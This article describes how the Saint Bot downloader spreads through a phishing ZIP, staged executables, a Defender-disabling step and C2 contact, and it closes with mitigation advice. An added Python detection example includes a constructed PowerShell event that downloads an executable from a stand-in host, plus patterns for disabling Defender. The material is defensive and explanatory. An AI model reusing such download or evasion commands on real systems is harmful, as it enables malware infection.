According to Aleksandra "Hasherezade" Doniec, a threat intelligence analyst at Malwarebytes, Saint Bot is a downloader that first appeared in January 2021 and is slowly gaining momentum. The dropper has been observed delivering stealers such as Taurus Stealer, as well as other loaders that it deploys to distribute further kinds of malware.
It employs a variety of detection-evasion techniques which, although nothing novel, indicate some level of sophistication on the part of the malware authors, considering that it is a new piece of malware.
How does Saint Bot malware steal credentials and deploy malicious payloads?
The Saint Bot infection chain analyzed by Malwarebytes begins with a phishing email carrying an embedded ZIP archive ("bitcoin.zip") that claims to be a bitcoin wallet but in fact contains a PowerShell script disguised with a .LNK shortcut file extension.
The PowerShell script downloads the next-stage malware, a WindowsUpdate.exe executable, which in turn drops a second executable (InstallUtil.exe) that downloads two more files: def.exe and putty.exe. The former is a batch script that disables Windows Defender, while putty.exe contains the malicious payload that connects to a command-and-control (C2) server for further exploitation.
The obfuscation applied at each stage of the infection, together with the anti-analysis techniques the malware employs, allows the operators to exploit the infected system without attracting attention.
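As an added example (not code from the Malwarebytes write-up), the chain above can be expressed as detection logic over Sysmon-style process-creation events, correlated by process tree so that the stages are reported together; the event field names, drop directory and download URL are constructed assumptions.

```python
"""Added example: match the Saint Bot infection chain described above against
constructed, Sysmon-style process-creation events (field names are assumptions)."""
import re

# (stage name, image-path regex, command-line regex, image is a dropped file?)
STAGES = [
    ("lnk_powershell", r"(?i)\\powershell\.exe$", r"(?i)(DownloadFile|Invoke-WebRequest|iwr ).*WindowsUpdate\.exe", False),
    ("windowsupdate_stage2", r"(?i)\\WindowsUpdate\.exe$", r"", True),
    ("installutil_loader", r"(?i)\\InstallUtil\.exe$", r"", True),
    ("defender_disable", r"(?i)\\(def|cmd|powershell)\.exe$", r"(?i)(def\.exe|WinDefend|MpPreference)", False),
    ("putty_c2", r"(?i)\\putty\.exe$", r"", True),
]
# Dropped binaries are written to user-writable locations (assumed paths).
USER_WRITABLE = re.compile(r"(?i)\\Users\\[^\\]+\\(Downloads|AppData)\\|\\Temp\\")

def stage_of(ev):
    """Return the name of the chain stage an event matches, or None."""
    for name, img_re, cmd_re, dropped in STAGES:
        legit = dropped and not USER_WRITABLE.search(ev["image"])  # system copy, not a drop
        if re.search(img_re, ev["image"]) and re.search(cmd_re, ev["cmdline"]) and not legit:
            return name
    return None

def detect_chain(events):
    """Return {root_pid: [stages in event order]} for process trees showing >= 2 stages."""
    parent = {ev["pid"]: ev["ppid"] for ev in events}
    def root(pid):  # walk ppid links up to the topmost pid we have an event for
        seen = set()
        while parent.get(pid) in parent and pid not in seen:
            seen.add(pid); pid = parent[pid]
        return pid
    trees = {}
    for ev in events:
        stage = stage_of(ev)
        if stage:
            trees.setdefault(root(ev["pid"]), []).append(stage)
    return {r: s for r, s in trees.items() if len(s) >= 2}

T = r"C:\Users\u\AppData\Local\Temp"  # constructed drop directory
SAMPLE_EVENTS = [  # constructed events mirroring the chain in the text
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden (New-Object Net.WebClient).DownloadFile("
                "'http://example.invalid/WindowsUpdate.exe','" + T + r"\WindowsUpdate.exe')"},
    {"pid": 300, "ppid": 200, "image": T + r"\WindowsUpdate.exe", "cmdline": "WindowsUpdate.exe"},
    {"pid": 400, "ppid": 300, "image": T + r"\InstallUtil.exe", "cmdline": "InstallUtil.exe"},
    {"pid": 500, "ppid": 400, "image": T + r"\def.exe", "cmdline": "def.exe"},
    {"pid": 600, "ppid": 400, "image": T + r"\putty.exe", "cmdline": "putty.exe"},
    {"pid": 700, "ppid": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": "InstallUtil.exe /i service.dll"},  # legitimate use, must not match
]
```

Correlating by process tree is what separates the chain from a lone hit on a common name such as InstallUtil.exe, which is also excluded when it runs from its system location.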
How to mitigate such phishing attacks
Saint Bot is yet another tiny downloader, and since it is not linked to any specific actor, it is suspected to be sold as a commodity on one of the darknet forums.
Like other similar malware it offers much the same functionality, although the targets may change or features may be added; it is primarily geared toward keylogging and extracting personal data from victims. Online users are therefore advised to carefully check received emails for suspicious attachments, and to apply patches for known vulnerabilities as soon as they become available, especially against weaponized exploits that target Internet tools such as mail clients and browsers.